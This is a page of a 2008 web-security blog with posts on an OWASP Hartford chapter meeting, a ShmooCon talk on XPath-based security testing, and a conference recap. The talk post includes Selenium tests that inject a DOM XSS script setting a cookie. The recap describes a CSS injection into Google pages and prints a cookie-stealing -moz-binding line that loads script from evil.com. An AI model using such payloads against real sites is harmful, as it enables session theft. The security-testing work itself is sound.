tssci security

OWASP Hartford tomorrow

Tomorrow, February 28th, is the first ever meeting for the brand new Hartford Owasp chapter. James McGovern, the chapter lead has been putting some effort into starting it off with a bang, so I hope everyone in the NY/CT/Mass area can make it. Agenda for the night is as follows:

The meeting will be held in the Atrium Conference Room at the Tower Building in Hartford Plaza, Hartford, CT 06115. From East (via Route 84):

  1. Approaching Hartford, follow Route 84 West to Exit 48 (Asylum Ave. Exit)
  2. At light, take a right onto Asylum Avenue
  3. Turn into entrance on right near Home Office
  4. Proceed to the Ramp Garage and park
  5. Enter the Tower Building using the West Entrance

From West (via Route 84):

  1. Approaching downtown Hartford, follow Route 84 East to Exit 48A (Asylum Ave. Exit)
  2. At light, take a left onto Asylum Avenue
  3. Turn into entrance on right near Home Office
  4. Proceed to the Ramp Garage and park
  5. Enter the Tower Building using the West Entrance

The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security "visible," so that people and organizations can make informed decisions about application security risks. Everyone is free to participate in OWASP and all of our materials are available under an open source license. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work.

Chenxi Wang, Ph.D., Principal Analyst, Forrester

Dr. Wang is a member of Forrester's Security and Risk Management research team. Her primary coverage areas include network security, content security, application security, and vulnerability management.

Prior to joining Forrester, Chenxi was the Chief Scientist for KSR, Inc, a risk management service provider start up in the Silicon Valley. Prior to that, Chenxi was an Associate Professor at Carnegie Mellon University. She taught and researched Computer Science and Computer security from 2001 to 2005. She was an instrumental faculty member behind the inception of CMU's Cylab. At CMU, Chenxi led a number of high profile research projects, including multi-million dollar projects from the Department of Defense and National Science Foundation. Chenxi was a consultant to HP Labs, Emerson, Lucent, and a number of Venture Capital companies.

Chenxi is a frequent speaker in research conferences. She delivered invited talks at Stanford, University of Cambridge, HP Labs, and many other academic institutions. She has served as a special investigative consultant for the Federal Trade Commission. Chenxi's background lends her the technical depth and analytical skills to create insightful research and advisories. At Forrester, she has delivered webinars and keynote speeches at vendor events, and in-depth advisory sessions at Microsoft, TrendMicro, JP Morgan, and other companies.

Chenxi holds a Ph.D. in Computer Science from the University of Virginia. Her Ph.D. research received ACM's Samuel L. Alexander outstanding doctoral research award.

Gary McGraw, Ph.D., CTO, Cigital

Gary McGraw is the CTO of Cigital, Inc., a software security and quality consulting firm with headquarters in the Washington, D.C. area. He is a globally recognized authority on software security and the author of six best selling books on this topic. The latest, Exploiting Online Games was released in 2007. His other titles include Java Security, Building Secure Software, Exploiting Software, and Software Security; and he is editor of the Addison-Wesley Software Security series. Dr. McGraw has also written over 90 peer-reviewed scientific publications, authors a monthly security column for darkreading.com, and is frequently quoted in the press. Besides serving as a strategic counselor for top business and IT executives, Gary is on the Advisory Boards of Fortify Software and Raven White. His dual PhD is in Cognitive Science and Computer Science from Indiana University where he serves on the Dean's Advisory Council for the School of Informatics. Gary is an IEEE Computer Society Board of Governors member and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine.

Posted by Marcin on Thursday, February 28, 2008 in Conferences, People and Security.

ShmooCon 2008 -- Path X: Explosive Security Testing Tools with XPath

On Sunday, we had some technical difficulties getting my laptop to work with the projector. In a scramble to get things up and running, I forgot to send the backup screenshots I had taken just in case. Ughh.. first conference talk I give, and everything that could have gone wrong, did. LOL. It was good experience at least. Note to self: Linux + ATI video cards really do suck. I apologize to everyone that came hoping to see our work in action. I'd also like to thank Tom Brennan, President of OWASP for helping us get setup and then giving our introduction on Sunday.

You can download our Path X: Explosive Security Testing Tools with XPath presentation slides [pdf], and here's an animated gif of using Selenium to test for DOM XSS.

Below is example HTML source code to our Selenium test case:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Set a cookie via DOM XSS</title>
</head>
<body>
<table cellpadding="1" cellspacing="1" border="1">
<thead>
<tr><td rowspan="1" colspan="3">Set a cookie via DOM XSS</td></tr>
</thead><tbody>
<tr>
    <td>open</td>
    <td>/awesome.html</td>
    <td></td>
</tr>
<tr>
    <td>deleteCookie</td>
    <td>name</td>
    <td>/</td>
</tr>
<tr>
    <td>type</td>
    <td>name</td>
    <td><script>document.cookie='name=xss;
        expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>
    </td>
</tr>
<tr>
    <td>click</td>
    <td>//input[@name='chat']</td>
    <td></td>
</tr>
<tr>
    <td>verifyCookie</td>
    <td>name=xss</td>
    <td>xss</td>
</tr>
<tr>
    <td>deleteCookie</td>
    <td>name</td>
    <td>/</td>
</tr>
</tbody></table>
</body>
</html>

And here is the same code as a Java integration test:

package com.example.tests;

import com.thoughtworks.selenium.*;
import java.util.regex.Pattern;

public class NewTest extends SeleneseTestCase {
    void testNew() throws Exception {
        selenium.open("/awesome.html");
        selenium.deleteCookie("name", "/");
        selenium.type("name", "<script>document.cookie='name=xss;expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>");
        selenium.click("//input[@name='chat']");
        verifyEquals("name=xss", selenium.getCookie());
        selenium.deleteCookie("name", "/");
    }
}

We're anxious to hear any comments that you have about our presentation. We've received a lot of positive feedback so far, and want to hear more. What would be your plans for implementing this in your devshop; is it too academic or far-fetched? We want to hear what you have to say, so let us know!

Cheers! -Marcin Wielgoszewski & Andre Gironda

Posted by Marcin on Tuesday, February 19, 2008 in Conferences and Security.

Back from D.C. -- ShmooCon 2008 recap

We're back from a great weekend in Washington, D.C. at ShmooCon 08'. Dre and I arrived Thursday night just in time for the bar to close and with having no hotel room reserved, we were in for a long night. Interestingly enough though, at around 5am, we found that we were able to modify the look of a Google page through a CSS stylesheet we controled. Using the tr:first-child td CSS property, we could do all sorts of things to Google's content, such as display:none and changing the color.

We had plans to meet up with Arshan of omg.wtf.bbq (and author of Anti-Samy) later that morning, so he invited us back to the Aspect Security office to hang out with the team. Jeff Williams, chairman of the OWASP board gave us a tour and we even had the chance to see the OWASP wiki, quietly humming away in its rack. So beautiful.. We showed off our finding to Arshan and Jeff to get some ideas on where to take it. I went in thinking we should try out -moz-binding:url(), so Arshan quickly wrote up some JavaScript that would steal Google cookies. We tried it out and it worked -- the working exploit affected Google through the following CSS property:

tr:first-child td {-moz-binding:url("http://evil.com/xssmoz.xml#xss");}

Later that evening, we met up with Romain Gaucher, Jon Rose, Brian Holyfield and a bunch of other people to go out drinking. We ended up discussing our talk a lot that night and some of the work we've all been doing. So much cool stuff, I can barely wrap my head around it all.

On Saturday, we hung out with Joe from Learn Security Online who gave me some cool tips on VoIP pen-testing, and which conveniently lead to seeing Jason Ostrom and John Kindervag (the VoIP hacker clowns) talk about penetration testing VoIP networks, something that'll come in real handy over the next couple weeks for me.

I shortly met up with Hoff for a bit, going to the talk on how databases are so hard to secure... After about five minutes I followed Hoff out and went to TL1 Device Security, which was pretty much over! The discussions though were great, and I got some good information out of it, having gone in not even knowing wtf a TL1 is. Basically a TL1 is SNMP for telecoms -- think SCADA without the controls, and only worse. eek

The best talk of the day was hands down, Rohit and Nish's talk on Using Aspect Oriented Programming to Prevent Application Attacks. What's nice about AOP is the ability to secure legacy code without having to touch the source. It would be nice to implement AOP along with building security in throughout the entire Secure SDLC. We got to talking with Rohit and Nish, along with their friend Hugo throughout the evening.

After our talk Sunday, Chris Gates and Dean came up to us to say hello. Like they said on their blog, it's nice finally putting faces to names. Anyways, that's pretty much it for this weekend. I'm working on getting our presentation content up soon (before the night's over), so stay tuned for that.

Posted by Marcin on Tuesday, February 19, 2008 in Conferences, People and Security.

Path X -- Explosive Security Testing

We have received details from ShmooCon with the scheduled day and time of our talk. We have been scheduled for the last talk on Sunday at 12pm noon (before the room split) on the "Build It" track. I'm not sure whether that's a good thing or bad thing, but we'll see. We're excited about the research we've done thus far -- we haven't seen much being done in this area, and we hope you see the value in it all. Check out the ShmooCon schedule and speakers list for the full schedule and list of all presentations and bios.

In this talk, we'll discuss how using XPath can aid security testing during unit tests and in the integration phase of the software development lifecycle. By using XPath, it's easier to share data between both open source and commercial quality testing, source code analysis tools and web application scanners.

First we'll go over a little history behind using regex in security tools and the paradox of parsers both being a vulnerability problem and a solution. Later, we'll explain XPath and how it's used in testing and then some XML parsing implementations in various languages. We'll close out our talk with a discussion on web application security internals, and how you can begin to [with relative ease] write your own web application security scanners.

"So all this talk about XPath without even mentioning what it is or what it does," you say? Well, XPath isn't really a tool. Tools use XPath to locate elements in web pages. Other ways of locating elements in a web pages is using DOM (Document Object Model) selectors or CSS selectors. An example of each is shown below, which would select the <h1> element within the <div id="header">:

DOM:
document.getElementById('header').getElementsByTagName('h1');
CSS:
div#header>h1
XPath:
//div[@id='header']/h1

So how do I use XPath? How does it apply to security? Those who've read Secure Programming with Static Analysis by Brian Chess and Jacob West would make the connection to using abstract syntax trees and lexical analysis to identify software vulnerabilities. In our talk, we look at using XPath expressions to find flaws in web applications.

Posted by Marcin on Sunday, February 17, 2008 in Conferences and Security.

« Newer entries — 13 — Older entries »

blog comments powered by Disqus